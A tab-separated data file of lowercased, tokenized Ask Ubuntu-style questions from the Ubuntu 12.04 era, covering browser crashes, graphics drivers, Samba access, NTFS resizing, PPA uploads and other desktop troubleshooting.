159307	why does firefox and chrome keep crashing ?	i did a fresh install of ubuntu , installing 12.04 . for a week or so everything was fine then the browsers kept crashing . chrome constantly keeps giving me the `` aw snap '' window , there is no particular page it happens on but it often crashes when i go on twitter and google news . firefox gave me the following report after it crashed a few moments ago : add-ons : langpack-en-gb @ firefox.mozilla.org:12.0 , langpack-en-za @ firefox.mozilla.org:12.0 , globalmenu @ ubuntu.com:3.2.3 , ubufox @ ubuntu.com:2.0.3 , { 972ce4c6-7e08-4474-a285-3208198ce6fd } :12.0 buildid : 20120423122624 crashtime : 1341360241 emcheckcompatibility : true framepoisonbase : 00000000f0dea000 framepoisonsize : 4096 installtime : 1336864437 notes : opengl : nvidia corporation -- geforce 8400 gs/pcie/sse2 -- 3.3.0 nvidia 295.40 -- texture_from_pixmap productid : { ec8030f7-c20a-464f-9b0e-13a3a9e97384 } productname : firefox releasechannel : release secondssincelastcrash : 565 startuptime : 1341359678 theme : classic/1.0 throttleable : 1 url : http : //www.google.co.uk/ vendor : mozilla version : 12.0 this report also contains technical information about the state of the application when it crashed . thanks for your help !
159310	access via network without password	have set-up samba and gotten connected to my ubuntu box from windows network , but now playing up with password and can not connect again : ( . i really need to get my data across to ubuntu box so i can use it as main pc instead of an ornament . data is currently scattered over several win pcs i really do not want the bother of a password as i need to be able to use all my computers as a unit . so how do i get rid of the need for a password .
159316	screen split oddly when os is installed from a live cd	never used linux before but i decided i want to start somewhere and ubuntu seemed like the right place to start . i burned the 64bit version iso onto a cd and installed it onto a fresh new hard drive i have . the live cd works and the live distro thing works great . however when i attempt to install it , the screen splits oddly in a way where part of the right is on the left . furthermore , after attempting to log in , the gui does n't show up and the computer would freeze and stay that way . however you can still move the cursor . i ca n't really get in or do anything ( possibly because i do n't know how ) and tinker around since i am not too tech savvy . but i can follow instructions . graphics card radeon hd 6670 i just tried the install with windows thing . there was the exact same problem .
159319	uploading to a ppa using quickly	i am trying to participate in ubuntu showdown . i followed jono 's tutorial to do a browser using quickly . i did some modifications including choosing license ( gpl v3 ) , putting my name in copy right ( without special spanish charecters since quicky does not like it ) $ quickly run to make sure it worked i used bazaar to commit a change with a line of comment . i packaged it using quickly . managed to install it ignoring some warnings but it would not run . i want to share code to get feedback . i have a launchpad account , signed terms and coditions , created a ppa . i got my commandline to talk to lauchpad using the encription key . but when i run $ quickly release or $ quickly share and it says the project does not exist . there seems to be another command $ dput ... but i do n't seem to get the wording right because it requests some sort of signed file that i can not manage to add the correct way . following the indications below i created a project . but when using $ quickly release and $ quickly share i get the following : kamehouse @ kamehouse-desktop : ~/mybrowser $ quickly releaseobtener preferencias de launchpad hay conexi贸n con launchpad no launchpad project set , leave blank to abort . launchpad project name : borra2 -- -- -- -- -- -- -- -- [ 1 ] -- -- -- -- -- -- -- -- toddler game for uncovering images -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- nombre del proyecto : borrados url en launchpad : https : //launchpad.net/borra2 this would be a very similar activity to the `` erase '' in gcompris . the idea is to access directly to te game and ake it `` toddler proof '' idealy it should work on touch screens . elija su n煤mero de proyecto , leave blank to abort , 0 for another search . your choice : 1 traceback ( most recent call last ) : file `` /usr/share/quickly/templates/ubuntu-application/release.py '' , line 154 , in < module > print ( _ ( `` % s does not exist . please create it on launchpad if you want to push a package to it . % s has the following ppas available : '' ) % ( e , ppa_user.name ) ) unicodedecodeerror : 'ascii ' codec ca n't decode byte 0xc3 in position 30 : ordinal not in range ( 128 ) error : la orden release ha fallado cancelando kamehouse @ kamehouse-desktop : ~/mybrowser $ quickly share obtener preferencias de launchpad hay conexi贸n con launchpad traceback ( most recent call last ) : file `` /usr/share/quickly/templates/ubuntu-application/share.py '' , line 127 , in < module > print ( _ ( `` % s does not exist . please create it on launchpad if you want to push a package to it . % s has the following ppas available : '' ) % ( e , ppa_user.name ) ) unicodedecodeerror : 'ascii ' codec ca n't decode byte 0xc3 in position 30 : ordinal not in range ( 128 ) error : la orden share ha fallado cancelando
159322	canon printer wo n't print some black part	i have a canon i560 installed on an ubuntu 12.04 . when i print the print test page , the `` ubuntu '' brand name which is black and the black circles do n't appear . but the black text in the lower part and the black frame does appear . i can supply a scanned image of the printed sheet if needed ( i can not upload it because i 'm a new user ... ) when i print from acrobat reader or from google chrome , the resulting page miss black text ( some text appear , other wo n't ) . printing from libreoffice or firefox work well . the configuration of the printer should be ok since i 'm able to print correctly from libreoffice and firefox . i configured the printer in cmyk mode . is it a bug related to ubuntu 12.04 ( i never had any problem with previous version but i 'm not sure the problem appeared with the upgrade to 12.04 ) or did i miss something ? if it 's a bug , in which package do i have to report it ? thank you .
159325	ubuntu and bumblebee and intel problem	i have a brain teaser that i ca n't solve . when 12.04 ( 64bits ) came out , i did a fresh install and then installed bumblebee with : sudo add-apt-repository ppa : bumblebee/stable sudo apt-get install bumblebee bumblebee-nvidia and ubuntu recognized ( system settings - details ) intel card for primary card , and i could launch applications with optirun . i have : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf119 [ geforce gt 520mx ] ( rev ff ) now , a few days back , i did the exact same thing , installed from the same dvd everything the same , installed bumblebee the same way . nvidia with optirun works fine , but ubuntu does n't have 3d effects : root @ deathstar : ~ # optirun /usr/lib/nux/unity_support_test -p opengl vendor string : nvidia corporation opengl renderer string : geforce gt 520mx/pcie/sse2 opengl version string : 4.2.0 nvidia 295.40 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : no gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no i never did anything to install intel drivers ( except installing mesa-utils ) , before bumblebee got everything working , but now i ca n't get ubuntu to get unity with 3d . can someone help me please get unity 3d working ? your help will be much appreciated
159330	my weather indicator resets on startup	this window pops up on startup , and my configuration is gone : how can i fix this ? i think the problem started when i began using a different ip , but it may be something else . i tried uninstalling and reinstalling , but did n't work . the appication is launched on startup like this : /usr/share/my-weather-indicator/my-weather-indicator.py
159339	why is n't ubuntu detecting all of my ram ?	i just upgraded my netbook from 1 gb of ram to 2 , but when i type free -g , it only says that i have 1 gb . how do i get it to detect all of my ram ?
159341	how to install ubuntu from desktop w/o internet access ?	i am trying to install ubuntu on a netbook without a cd drive . i first attempted a flash drive , but it did not work , so i decided to use the flash drive to transfer the application that can install from the desktop . however , this is a secondhand school computer that needs its borderline spyware security suite wiped before it can access the internet , so i can not use the install from desktop application . do i have any other options ? i do have access to an external cd drive that i could try , but i am unconvinced that i would get different results since it would have to go through a usb port . any and all input is very much appreciated !
159342	web based management for lxc containers ?	i need a way to manage lxc containers on ubuntu server 12.04 - similar to what proxmox is . googling indicates that openstack is one option - would this work ?
159344	does ubuntu works on 2012 sony viao s 15-inch ?	can anyone report whether ubuntu works on the new ( june 2012 ) sony viao s 15 ? if so , which version ?
159354	ca n't shrink windows boot ntfs disk : error ( 5 ) : could not map attribute 0x80 in inode , input/output error	ubuntu 12.04 lts , all updates current as of 7/3/2012 gksudo gparted shrink /dev/sda2 from 367gb to 307gb gparted 0.11.0 -- enable-libparted-dmraid libparted 2.3 shrink /dev/sda2 from 367.00 gib to 307.00 gib 00:32:57 ( error ) calibrate /dev/sda2 00:00:00 ( success ) path : /dev/sda2 start : 20,484,096 end : 790,142,975 size : 769,658,880 ( 367.00 gib ) check file system on /dev/sda2 for errors and ( if possible ) fix them 00:00:53 ( success ) ntfsresize -p -i -f -v /dev/sda2 ntfsresize v2012.1.15ar.1 ( libntfs-3g ) device name : /dev/sda2 ntfs volume version : 3.1 cluster size : 4096 bytes current volume size : 394065338880 bytes ( 394066 mb ) current device size : 394065346560 bytes ( 394066 mb ) checking for bad sectors ... checking filesystem consistency ... accounting clusters ... space in use : 327950 mb ( 83.2 % ) collecting resizing constraints ... estimating smallest shrunken size supported ... file feature last used at by inode $ mft : 389998 mb 0 multi-record : 394061 mb 386464 $ mftmirr : 314823 mb 1 compressed : 394064 mb 1019521 sparse : 330887 mb 752454 ordinary : 393297 mb 706060 you might resize at 327949758464 bytes or 327950 mb ( freeing 66116 mb ) . please make a test run using both the -n and -s options before real resizing ! shrink file system 00:32:04 ( error ) run simulation 00:32:04 ( error ) ntfsresize -p -- force -- force /dev/sda2 -s 329640837119 -- no-action ntfsresize v2012.1.15ar.1 ( libntfs-3g ) device name : /dev/sda2 ntfs volume version : 3.1 cluster size : 4096 bytes current volume size : 394065338880 bytes ( 394066 mb ) current device size : 394065346560 bytes ( 394066 mb ) new volume size : 329640829440 bytes ( 329641 mb ) checking filesystem consistency ... accounting clusters ... space in use : 327950 mb ( 83.2 % ) collecting resizing constraints ... needed relocations : 13300525 ( 54479 mb ) schedule chkdsk for ntfs consistency check at windows boot time ... resetting $ logfile ... ( this might take a while ) relocating needed data ... updating $ badclust file ... updating $ bitmap file ... error ( 5 ) : could not map attribute 0x80 in inode 1667593 : input/output error ======================================== windows has run chkdsk successfully ( on boot ) several times now
159357	is there an ubuntu program to find anonymous proxy servers ?	i 've been seeking for a software like proxyfire in ubuntu to connect to the socks proxy with it . but i found nothing . now is there anyone to introduce me with a program like that ? i really need it .
159360	really slow wireless internet on 12.04 with hp dv6 6070ca	i was recently running the previous version of ubuntu through wine , and everything was working great . i decided to upgrade to pangolin when i saw it came out . after upgrading the internet was very slow ( the estimated time on the updates was something like 4 days ) . i thought maybe this had something to do with the wine installation , so i decided to finally do an actual dual boot . i partitioned my drive all nice and neat , but i made the mistake of connecting to the internet for the installation , and clicking the option to install updates and restricted extras . this was in the morning , circa 6 am . fast forward to the evening , the installation is frozen at around 75 % . in frustration i gave the ol girl a hard shut-down , which effectively rendered my machine useless . i used the thumb drive to reinstall ubuntu , this time without connecting to the internet . installed nice and easy , no problems , but the internet is still ridiculously slow . it took me about 20 minutes of frustration and hitting stop and reload repeatedly to even get this question page to open . this is important to me as now windows wo n't even boot and i have to use ubuntu for the time being but i ca n't even bear to turn on my laptop due to the frustration that immediately ensues . please help ! oh , and i 'm relatively new so if there are some terminal commands that spew out info you guys would find useful let me know what they are and i 'll post back the information .
159368	what should i do when hard `` disk failure is imminent '' ?	i been using this before on back-up , but when i plugged it again , it goes like this , what should i do ?
159369	script to find executable based on extension of a file ?	i need to create a script that returns the default app to be used for a given file extension ( including the path ) . i had a look at the file command which can return the mime type and xdg-open which would open a file . but what i 'd like to get is myscript doc /usr/bin/libreoffice .or . myscript fun /opt/acme/roadrunner/meepmeep how do i do that ?
159373	abysmal 3d performance in wine with ati hd6950 under 12.04	running vanilla wow in both wine 1.4 and through playonlinux which is using wine 1.2.1 and performance is completely unacceptable . 3d is working fine in native linux titles such as bastion . here 's what things look like with opengl ( there 's a lot of graphical corruption in terms of objects flickering , also there appears to be a log or something wedged in my character , this screenshot does n't do a good job of showing it off ) : and here 's things with directx 9 : i have the ubuntu provided ati drivers on a hd6950 , and i do n't know why things are so bad . the game runs at vsync at 1920x1080 at max settings with aa in 3d on windows without a problem . oh , and 64-bit if that changes anything . ruscour @ ruscour-desktop : ~ $ glxgears 6996 frames in 5.0 seconds = 1399.169 fps 7548 frames in 5.0 seconds = 1509.521 fps ruscour @ ruscour-desktop : ~ $ fgl_glxgears using glx_sgix_pbuffer 2875 frames in 5.0 seconds = 575.000 fps 2906 frames in 5.0 seconds = 581.200 fps that 's in unity 3d , have n't messed too much with anything so compositing probably enabled if it 's on by default . various diagnostics : lspci -v ruscour @ ruscour-desktop : ~ $ lspci -v 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati cayman pro [ radeon hd 6950 ] ( prog-if 00 [ vga controller ] ) subsystem : pc partner limited device 186b flags : bus master , fast devsel , latency 0 , irq 54 memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at fe8e0000 ( 64-bit , non-prefetchable ) [ size=128k ] i/o ports at c000 [ size=256 ] expansion rom at fe8c0000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : fglrx_pci kernel modules : fglrx , radeon fglrxinfo ruscour @ ruscour-desktop : ~ $ fglrxinfo display : :0.0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 6900 series opengl version string : 4.2.11627 compatibility profile context xvinfo ruscour @ ruscour-desktop : ~ $ xvinfo x-video extension version 2.2 screen # 0 adaptor # 0 : `` amd radeon avivo video '' number of ports : 4 port base : 143 operations supported : putimage supported visuals : depth 24 , visualid 0x23 depth 24 , visualid 0x24 depth 24 , visualid 0x25 depth 24 , visualid 0x26 depth 24 , visualid 0x27 depth 24 , visualid 0x28 depth 24 , visualid 0x29 depth 24 , visualid 0x2a depth 24 , visualid 0x2b depth 24 , visualid 0x2c depth 24 , visualid 0x2d depth 24 , visualid 0x2e depth 24 , visualid 0x2f depth 24 , visualid 0x30 depth 24 , visualid 0x31 depth 24 , visualid 0x32 depth 24 , visualid 0x33 depth 24 , visualid 0x34 depth 24 , visualid 0x35 depth 24 , visualid 0x36 depth 24 , visualid 0x37 depth 24 , visualid 0x38 depth 24 , visualid 0x39 depth 24 , visualid 0x3a depth 24 , visualid 0x3b depth 24 , visualid 0x3c depth 24 , visualid 0x3d depth 24 , visualid 0x3e depth 24 , visualid 0x3f depth 24 , visualid 0x40 depth 24 , visualid 0x41 depth 24 , visualid 0x42 depth 24 , visualid 0x43 depth 24 , visualid 0x44 depth 24 , visualid 0x45 depth 24 , visualid 0x46 depth 24 , visualid 0x47 depth 24 , visualid 0x48 depth 24 , visualid 0x49 depth 24 , visualid 0x4a depth 24 , visualid 0x4b depth 24 , visualid 0x4c depth 24 , visualid 0x4d depth 24 , visualid 0x4e depth 24 , visualid 0x4f depth 24 , visualid 0x50 depth 24 , visualid 0x51 depth 24 , visualid 0x52 depth 24 , visualid 0x53 depth 24 , visualid 0x54 depth 24 , visualid 0x55 depth 24 , visualid 0x56 depth 24 , visualid 0x57 depth 24 , visualid 0x58 depth 24 , visualid 0x59 depth 24 , visualid 0x5a depth 24 , visualid 0x5b depth 24 , visualid 0x5c depth 24 , visualid 0x5d depth 24 , visualid 0x5e depth 24 , visualid 0x5f depth 24 , visualid 0x60 depth 24 , visualid 0x61 depth 24 , visualid 0x62 depth 24 , visualid 0x63 depth 24 , visualid 0x64 depth 24 , visualid 0x65 depth 24 , visualid 0x66 depth 24 , visualid 0x67 depth 24 , visualid 0x68 depth 24 , visualid 0x69 depth 24 , visualid 0x6a depth 24 , visualid 0x6b depth 24 , visualid 0x6c depth 24 , visualid 0x6d depth 24 , visualid 0x6e depth 24 , visualid 0x6f depth 24 , visualid 0x70 depth 24 , visualid 0x71 depth 24 , visualid 0x72 number of attributes : 10 `` xv_set_defaults '' ( range 0 to 1 ) client settable attribute `` xv_double_buffer '' ( range 0 to 1 ) client settable attribute client gettable attribute ( current value is 1 ) `` xv_brightness '' ( range -1000 to 1000 ) client settable attribute client gettable attribute ( current value is 0 ) `` xv_contrast '' ( range -1000 to 1000 ) client settable attribute client gettable attribute ( current value is 0 ) `` xv_saturation '' ( range -1000 to 1000 ) client settable attribute client gettable attribute ( current value is 0 ) `` xv_color '' ( range -1000 to 1000 ) client settable attribute client gettable attribute ( current value is 0 ) `` xv_hue '' ( range -1000 to 1000 ) client settable attribute client gettable attribute ( current value is 0 ) `` xv_red_intensity '' ( range -1000 to 1000 ) client settable attribute client gettable attribute ( current value is 0 ) `` xv_green_intensity '' ( range -1000 to 1000 ) client settable attribute client gettable attribute ( current value is 0 ) `` xv_blue_intensity '' ( range -1000 to 1000 ) client settable attribute client gettable attribute ( current value is 0 ) maximum xvimage size : 4096 x 4096 number of image formats : 4 id : 0x32315659 ( yv12 ) guid : 59563132-0000-0010-8000-00aa00389b71 bits per pixel : 12 number of planes : 3 type : yuv ( planar ) id : 0x30323449 ( i420 ) guid : 49343230-0000-0010-8000-00aa00389b71 bits per pixel : 12 number of planes : 3 type : yuv ( planar ) id : 0x32595559 ( yuy2 ) guid : 59555932-0000-0010-8000-00aa00389b71 bits per pixel : 16 number of planes : 1 type : yuv ( packed ) id : 0x59565955 ( uyvy ) guid : 55595659-0000-0010-8000-00aa00389b71 bits per pixel : 16 number of planes : 1 type : yuv ( packed ) glxinfo | grep rendering returns yes . if anything else is needed to help me out , just ask and i 'll post it . i 'm sure i 'm missing something obvious , like there 's some 32-bit gl library i do n't have or something like that , but i 'm stuck so hopefully someone can give me a hand .
159375	why did remastersys mess up my folder structure ?	i made a distro of ubuntu from remastersys . everything works except , the places are messed up . the home folder acts as the desktop folder and i ca n't see my pictures , my videos etc folders inside home . i copied my entire home folder to /etc/skel/ before creating the distro . any advice please ?
159376	lubuntu 12.04 extended display ( nvidia )	currently , i have a lubuntu laptop with nvidia driver installed . i 'm trying to extend my display , but ( after a couple of reboots ) all i can see on the other display is a big x whenever i move my cursor to that display . below is my xorg.conf file : # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 295.49 ( buildmeister @ swio-display-x86-rhel47-07.nvidia.com ) tue may 1 00:54:24 pdt 2012 # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 280.13 ( buildd @ allspice ) thu aug 11 20:54:45 utc 2011 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` auo '' horizsync 30.0 - 75.0 vertrefresh 60.0 option `` dpms '' endsection section `` monitor '' # horizsync source : builtin , vertrefresh source : builtin identifier `` monitor1 '' vendorname `` unknown '' modelname `` crt-0 '' horizsync 28.0 - 55.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 305m '' busid `` pci:1:0:0 '' screen 0 endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 305m '' busid `` pci:1:0:0 '' screen 1 endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` twinviewxineramainfoorder '' `` crt-0 '' option `` metamodes '' `` dfp : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` crt : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection any suggestions on what i should to get this working ? thanks : d p.s : i chose `` separate x-window '' option from nvidia configuration tool
159377	why can i burn a debian cd but fail to burn an ubuntu cd ?	i 've downloaded ubuntu server 4 times now and burnt it over 10 times , trying to get it to work on an older machine . the burn goes through , and when the test phase hits there is always an error that the disc track sectors are less than the image file sectors . i 've been using imgburn on two different laptops ( asus g73sx and an older asus laptop ) and on a desktop to burn it with no luck . i 've downloaded from the aarnet mirror and iinet mirrors with no noticeable difference . i 've tried the desktop version as well , with the same error . when trying to use the discs , it runs the syslinux bootloader but then nothing happens , even after 10 minutes . on a lark , i just downloaded debian and burnt that , and it worked without a hitch . this to me proves the burner and software i 'm using are functional , and the optical drive in my new file server works properly . i 've set it up as a basic fileserver to confirm that the hardware seems fine . also , i 've used lili usb creator to unload the images onto a usb stick , and that did n't work either ... i 'd really rather use ubuntu for this project , but it is increasingly looking like i 'll have to use debian as i just ca n't get -any- ubuntu image to work , despite trying a variety of methods . can someone please advise anything else i can do ? update : burning at half speed worked .
159379	have to run chrome from 'google-chrome -- disable-bundled-ppapi-flash ' command to start it after kernel upgrade	very recently , my kernel was upgarded from 3.2.0-25-generic to 3.2.0-26-generic through update manager . since then , my google chrome can not be opened up as usual from dash home or command line ( google-chrome ) although i can see it sleeping in the system monitor . now i have to run google chrome using command google-chrome -- disable-bundled-ppapi-flash but have to sacrifice flash function . how to open it up as normal ? the detail info of my computer are as follow : google-chrome-stable 20.0.1132.47-r144678 distributor id : ubuntu description : ubuntu 12.04 lts release : 12.04 codename : precise 3.2.0-26-generic # 41-ubuntu smp thu jun 14 16:26:01 utc 2012 i686 athlon i386 gnu/linux processor : 0 vendor_id : authenticamd cpu family : 6 model : 10 model name : amd athlon ( tm ) xp 2500+ stepping : 0 cpu mhz : 1837.000 cache size : 512 kb fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 mmx fxsr sse syscall mmxext 3dnowext 3dnow up bogomips : 3681.99 clflush size : 32 cache_alignment : 32 address sizes : 34 bits physical , 32 bits virtual power management : ts
159380	is there software that can record sound input ?	i have a ion tape 2 pc cassette player , is there any software that would record the cassette as i play it ?
159381	use vimdiff in place of diff to compare configs during package updates	sometimes when you perform packages updates , you 'll be prompted with action to take when apt tries to update packages which contain updated configs . i 'd like to know if there 's a way to invoke vimdiff in place of diff when pressing d in this question . configuration file `/etc/gnome/defaults.list' == > modified ( by you or by a script ) since installation . == > package distributor has shipped an updated version . what would you like to do about it ? your options are : y or i : install the package maintainer 's version n or o : keep your currently-installed version d : show the differences between the versions z : start a shell to examine the situation the default action is to keep your current version . *** defaults.list ( y/i/n/o/d/z ) [ default=n ] ? d
159383	how can i find the location of files installed via software center are available ?	i would like to know where i can find the location of program files of programs installed from the ubuntu software center .
159397	how to enable touchpad ?	yesterday , suddenly my touchpad on my msi laptop started to not respond . in other words , in login screen , touchpad is working as expected . however , in desktop screen , after i have logged in , touchpad is not working . how can i enable touchpad in desktop ?
159398	how to add multiple directories to xscreensaver ?	what i learned from reading man page for xscreensaver man page that i will have to edit .xscreensaver under my home directory . in here there is option to set directory set with option imagedirectory : i want to know is there any way i can add multiple directories to show in the screensaver
159413	gtkfilechooserbutton 'select folder ' mode returns no path	i have added a gtkfilechooserbutton to my app via glade . it is set to folder selection mode . when the widget is clicked it shows a dropdown list of nautilus bookmarks with an 'other ' option in the end . a new file chooser dialog is launched when 'other ' is clicked . the button is not connected to any other custom file chooser dialog . the connecting signal i am using is 'file-set ' and i am retrieving the fullpath of user selected folder using gtk.filechooser.get_current_folder ( ) . this setup works fine if user selects a folder from 'other ' option . but if a user selects a bookmark from dropdown list , no path is returned . how to solve this ? is there a way to disable this dropdown list and directly go to the filechooser dialog ? i want to use gtkfilechooserbutton only so that the user can get a preview of his selected folder .
159417	deleted files not increasing available free space as reported by df -h	i am writing data munging scripts ( python and bash ) , to munge data and import large quantities of text files into a database . i am currently in the test phase , so i am generating several k 's of files and deleting them ( the files consume about 20g of space ) . after a test run , i delete the files ( sometimes without having imported into the database ) . i notice that there is a steady decrease in the amount of free space on my disk ( as reported by df -h ) . i do n't understand this , as i use rm * ( in the data directory ) , and in the cases where i use nautilus , i empty the trash bin as well . similarly , i notice that when i import the data into the ( postgresql ) database , and then delete the data from the tables using delete from tablename ; , the size consumed in the postgresql data directory does not go down either . currently , i have lost approximately 200g from hard drive , and i need to reclaim that - but do n't know what to do to reclaim it - any ideas ? . i am running ubuntu 10.0.4 lts + postgresql 8.4 [ [ update ] ] du -c / | 2 > /dev/null | grep total produces this output : 4 /usr/src/linux-headers-2.6.32-38-generic/include/config/mtdram/total 4 /usr/src/linux-headers-2.6.32-41-generic/include/config/mtdram/total 4 /usr/src/linux-headers-2.6.32-36-generic/include/config/mtdram/total 4 /usr/src/linux-headers-2.6.32-30-generic/include/config/mtdram/total 4 /usr/src/linux-headers-2.6.32-35-generic/include/config/mtdram/total 4 /usr/src/linux-headers-2.6.32-31-generic/include/config/mtdram/total 4 /usr/src/linux-headers-2.6.32-27-generic/include/config/mtdram/total 4 /usr/src/linux-headers-2.6.32-28-generic/include/config/mtdram/total 4 /usr/src/linux-headers-2.6.32-40-generic/include/config/mtdram/total 4 /usr/src/linux-headers-2.6.32-34-generic/include/config/mtdram/total 4 /usr/src/linux-headers-2.6.32-37-generic/include/config/mtdram/total 4 /usr/src/linux-headers-2.6.32-33-generic/include/config/mtdram/total 4 /usr/src/linux-headers-2.6.32-39-generic/include/config/mtdram/total 4 /usr/src/linux-headers-2.6.32-29-generic/include/config/mtdram/total 4 /usr/src/linux-headers-2.6.32-32-generic/include/config/mtdram/total 187426036 total df -hi produces this output : filesystem inodes iused ifree iuse % mounted on /dev/sda1 29m 1.8m 27m 7 % / none 491k 776 490k 1 % /dev none 492k 6 492k 1 % /dev/shm none 492k 76 492k 1 % /var/run none 492k 2 492k 1 % /var/lock none 492k 1 492k 1 % /lib/init/rw /dev/sdb1 30m 3.0k 30m 1 % /mydata /dev/sdc1 0 0 0 - /media/cruzer
159427	ca n't move tabs in chrome	when i try to move tabs in chrome they always open in a new window and ca n't be moved back to old window . using latest chrome from official repository . worked fine before with gnome . any ideas how to fix , apart from going back to gnome ?
159428	how to debug slow session start of gnome 3 ?	after upgrade from 11.10 to 12.04 , the login process of gnome 3 is extremely slow ( it takes in the order of 60 seconds when it was in the order of a few seconds before the upgrade ( harddisk is a ssd ! ) ) . running `` top '' in a vt shows that gnome-shell is producing about 90 % cpu load while dbus-daemon is taking roughly 10 % . the moment when cpu-load of gnome-shell drops to normal levels ( around 2-3 % ) corresponds to the time the login process is terminated and the desktop is displayed . de-activating the four gnome-shell extensions ( alternative status menu , quit button , remove accessibility , system-monitor ) that i have installed does not have any effect on session start up time . login to gnome classic does not show the slow session start . the system logs do not show anything suspicious . thus , what is the best way to identify the underlying problem ?
159433	not able to configure graphics	i bought a new dell inspiron 5420 with 11.10 preinstalled . i am not able to configure my graphic settings . how do i check whether my nvidia graphics is working or not ? how to check my intel graphics too battery backup is too low . i tried jupiter but its not working . is there any alternative software for power management ?
159436	what is the default password for the maas image ?	what is the ubuntu 12.04 lts image password ? i installed it as a node of ubuntu maas with cobbler . it retrieved packages over internet and installed it . i have just ssh public key , but i do not have password or other credentials . can i obtain it from somewhere else ?
159438	ca n't enable user theme extension	i 've searched in google and looked in another questions , but still i ca n't solve this problem ! i want to install gnome-shell theme . so i 'm trying to enable user-theme-extension in gnome tweak tool . but i ca n't enable it . it has a yellow triangle near it says '' extensions does not support shell version '' what should i do ? how can i install gnome shell themes ?
159441	what does `` compiz -- replace '' do ?	sorry for the stupid question but i am new with linux ( i am using gnome classic with ubuntu 12.04 ) and i can not set compiz in order to obtain the rotating cube . i have already installed compizconfig-setting-manager and also the extra ( and fusion ) plugins but : even if i disable the desktop wall and enable cube and rotating cube , nothing happens ; even if i change into general settings the number of vertical and horizontal virtual size nothing happens . what i need is ( possibly ) a step by step answer . thank you ok ... i solved my problem by using the command . compiz -- replace which i have found looking around . can someone explain me what i have precisely performed with this command ? thanks in advance
159442	how do i wipe and set up donated laptops with ubuntu ?	i run an organisation that cleans data from donated laptops and reinstalls minimal operating systems and office for poor schools in rural india . i plan to boot and wipe the laptops i receive , but i do n't know what to do after that to install ubuntu . which release/variant/version should i burn onto cd/dvd ? in terms of software , would like to install at least openoffice on the laptops .
159451	software to draw signals , time-diagrams , etc for electronics ?	i am looking a tool to draw signal , time diagram etc . are there any software wcih is available in ubuntu 12.04 ? signal can be various : triangle square etc .
159453	share home directory between linux and windows dual boot	this question is somewhat similar to how to use windows share has home directory , but in this case windows is not running . i have installed a dual-boot configuration with ubuntu 12.04 and windows . my windows partition is mounted on /c . now i want either ubuntu to locate home directories in /c/users which is the location of windows accounts or i want windows to use d : \home for home directories . ( d is the name of the ubuntu root directory ) . for the first approach , i have managed to create a test user account test-user : x:1004:1001 : test : /c/users/test-user : /bin/bash the account works but test-user can not run any x session . from .xsession-errors chmod : changing rights on â/c/users/test-user/.xsession-errorsâ : operation not permitted would it help get rid of that chmod , which has no effect ? how do i ? if i use the second approach , i need the ext2fsd driver , which seems to work , but i am not sure if windows maps the ext2 system that early . here is my fstab proc /proc proc nodev , noexec , nosuid 0 0 uuid=e7cef061-ed8d-4a82-b708-0c8f4c6f297f / ext3 errors=remount-ro 0 1 uuid=2cdceb43dceb0644 /c ntfs defaults , umask=007 , gid=46 0 0 uuid=b087b5c0-b4bd-47e7-8d34-48ad9b192328 none swap sw 0 0 update : i found something here : http : //www.tuxera.com/community/ntfs-3g-advanced/ will work if i do a correct mapping between nt users and linux users .
159454	why does trying to get to a virtual terminal give me a `` no signal '' blank screen ?	i have recently installed ubuntu 10.04 and when i attempted to apply command line mode with crtl-alt-f1 my monitor complains that no signal is being sent to it and i get no display . however , via guesswork and slow typing i can enforce a reboot from command line so i know that the os is still running . i have checked my boards bios and there are no vga settings to play with so i am stuck . previously i had installed 8.04 and reverting to the command line worked fine with that so i do not think that it is a hardware problem . are there any settings i can play with to see if i can resolve this problem ? ? ? i have searched here for questions with similar problems but without success . i am running on the vortex86 embedded system
159458	why can i no longer install synaptic in 12.04 ?	in ubuntu 12.04 , you have suggested installing the synaptic package manager with sudo apt-get install synaptic which did n't work for me . i tried sudo apt-get upgrade and also sudo apt-get update , but had the same problem . i did not have these problems on ubuntu 11.10 .
